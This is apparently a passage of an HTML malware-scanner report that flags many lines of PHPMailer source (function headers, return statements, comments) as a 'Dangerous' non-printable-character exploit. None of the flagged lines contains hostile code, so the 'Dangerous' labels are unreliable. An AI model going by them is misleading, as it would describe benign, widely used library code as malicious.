<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
